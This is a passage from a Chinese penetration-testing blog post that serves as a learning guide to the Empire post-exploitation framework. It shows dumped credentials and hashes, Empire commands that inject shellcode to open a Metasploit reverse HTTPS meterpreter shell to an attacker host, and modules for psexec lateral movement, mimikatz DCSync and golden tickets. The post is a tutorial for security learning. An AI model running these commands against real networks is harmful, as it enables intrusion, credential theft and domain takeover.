WIN-6S1ISV98BNM  256897bbd391086a1fea9e03a711487c</span><br><span class="line">  3       plaintext  test.com                 Administrator    WIN-6S1ISV98BNM  P@ssw0rd</span><br><span class="line">  4       hash       test.com                 WIN-6S1ISV98BNM$ WIN-6S1ISV98BNM  c8c4141f359974d60d46e5a60e0f1407</span><br></pre></td></tr></table></figure>
<h3 id="联动Metasploit"><a href="#联动Metasploit" class="headerlink" title="联动Metasploit"></a>联动Metasploit</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">empire：</span><br><span class="line">(Empire: agents) &gt; interact V92TNFDK</span><br><span class="line">(Empire: V92TNFDK) &gt; usemodule code_execution/invoke_shellcode</span><br><span class="line">(Empire: code_execution/invoke_shellcode) &gt; info</span><br><span class="line">(Empire: code_execution/invoke_shellcode) &gt; set Lhost  10.0.0.86</span><br><span class="line">(Empire: code_execution/invoke_shellcode) &gt; set Lport 4433</span><br><span class="line">(Empire: code_execution/invoke_shellcode) &gt; execute</span><br><span class="line"></span><br><span class="line">metasploit：</span><br><span class="line">msf &gt; use exploit/multi/handler</span><br><span class="line">msf exploit(handler) &gt; set payload windows/meterpreter/reverse_https</span><br><span class="line">payload =&gt; windows/meterpreter/reverse_https</span><br><span class="line">msf exploit(handler) &gt; set lhost 192.168.199.122</span><br><span class="line">msf exploit(handler) &gt; set lport 4444</span><br><span class="line">msf exploit(handler) &gt; run</span><br></pre></td></tr></table></figure>
<h3 id="其他常用的模块"><a href="#其他常用的模块" class="headerlink" title="其他常用的模块"></a>其他常用的模块</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">(Empire: V92TNFDK) &gt;usemodule situational_awareness/network/find_localadmin_access #加载本地管理组访问模块</span><br><span class="line">(Empire: V92TNFDK) &gt; usemodule lateral_movement/invoke_psexec // psexec模块横向生成一个反弹代理</span><br><span class="line">(Empire: V92TNFDK) &gt; usemodule credentials/mimikatz/dcsync  //获取域的krbtgt值</span><br><span class="line">(Empire: V92TNFDK) &gt; usemodule credentials/mimikatz/golden_ticket //获得黄金票据</span><br><span class="line">(Empire: V92TNFDK) &gt;usemodule situational_awareness/host/computerdetails //获取系统日志</span><br></pre></td></tr></table></figure>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>Metasploit，Empire，Cobal strike是日常渗透中最经常使用的三大平台，对于三大平台的学习，可以使渗透工作事半功倍，在Empire之后，还有把Cobal strike的日常学习也要总结出来，有时候不经常总结就会遗忘。</p>
<p>本文的学习参考来自于<a href="https://xz.aliyun.com/t/67" target="_blank" rel="noopener">https://xz.aliyun.com/t/67</a></p>

    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>原文作者：<a href="https://markhacker.github.io">mark</a>
            </p><p>原文链接：<a href="https://markhacker.github.io/2018/12/06/Empire学习指南/">https://markhacker.github.io/2018/12/06/Empire学习指南/</a>
            </p><p>发表日期：<a href="https://markhacker.github.io/2018/12/06/Empire学习指南/">December 6th 2018, 4:13:00 pm</a>
            </p><p>更新日期：<a href="https://markhacker.github.io/2018/12/06/Empire学习指南/">March 24th 2019, 1:26:06 pm</a>
            </p><p>版权声明：本文采用<a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href="/2019/04/04/lotus模块修改/" title="关于metasploit模块lotus版本大于9.0的修改">
                    <div class="nextTitle">关于metasploit模块lotus版本大于9.0的修改</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href="/2018/07/06/Metasploit使用小结/" title="Metasploit常用模块总结">
                    <div class="prevTitle">Metasploit常用模块总结</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:my@marksec.org" class="iconfont-archer email" title="email"></a>
            
        
    
        
            
                <a href="//https://github.com/markhacker" class="iconfont-archer github" target="_blank" title="github"></a>
            
        
    
        
            
                <span class="iconfont-archer wechat" title="wechat">
                  
                  <img class="profile-qr" src="/assets/weixin.jpg">
                </span>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#安装启动"><span class="toc-number">1.</span> <span class="toc-text">安装启动</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#模块简介"><span class="toc-number">2.</span> <span class="toc-text">模块简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#使用方法"><span class="toc-number">3.</span> <span class="toc-text">使用方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#模块学习"><span class="toc-number">4.</span> <span class="toc-text">模块学习</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#检查UAC提权方法模块"><span class="toc-number">4.1.</span> <span class="toc-text">检查UAC提权方法模块</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#UAC提权模块"><span class="toc-number">4.2.</span> <span class="toc-text">UAC提权模块</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#域环境信息收集模块"><span class="toc-number">4.3.</span> <span class="toc-text">域环境信息收集模块</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mimikatz模块"><span class="toc-number">4.4.</span> <span class="toc-text">mimikatz模块</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#联动Metasploit"><span class="toc-number">4.5.</span> <span class="toc-text">联动Metasploit</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#其他常用的模块"><span class="toc-number">4.6.</span> <span class="toc-text">其他常用的模块</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#总结"><span class="toc-number">5.</span> <span class="toc-text">总结</span></a></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 5
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/04</span><a class="archive-post-title" href="/2019/04/04/lotus模块修改/">关于metasploit模块lotus版本大于9.0的修改</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2018 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/06</span><a class="archive-post-title" href="/2018/12/06/Empire学习指南/">Empire学习指南</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">07/06</span><a class="archive-post-title" href="/2018/07/06/Metasploit使用小结/">Metasploit常用模块总结</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2017 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/19</span><a class="archive-post-title" href="/2017/12/19/内网渗透之抓hash/">内网渗透之hash抓取</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">02/16</span><a class="archive-post-title" href="/2017/02/16/无线WiFi破解/">无线wifi破解</a>
        </li>
    
    </ul></div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
        <span class="sidebar-tag-name" data-tags="内网渗透"><span class="iconfont-archer">&#xe606;</span>内网渗透</span>
    
        <span class="sidebar-tag-name" data-tags="empire"><span class="iconfont-archer">&#xe606;</span>empire</span>
    
        <span class="sidebar-tag-name" data-tags="powershell"><span class="iconfont-archer">&#xe606;</span>powershell</span>
    
        <span class="sidebar-tag-name" data-tags="metasploit"><span class="iconfont-archer">&#xe606;</span>metasploit</span>
    
        <span class="sidebar-tag-name" data-tags="Web安全"><span class="iconfont-archer">&#xe606;</span>Web安全</span>
    
        <span class="sidebar-tag-name" data-tags="无线安全"><span class="iconfont-archer">&#xe606;</span>无线安全</span>
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br>
    1、请确保node版本大于6.2<br>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "mark"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


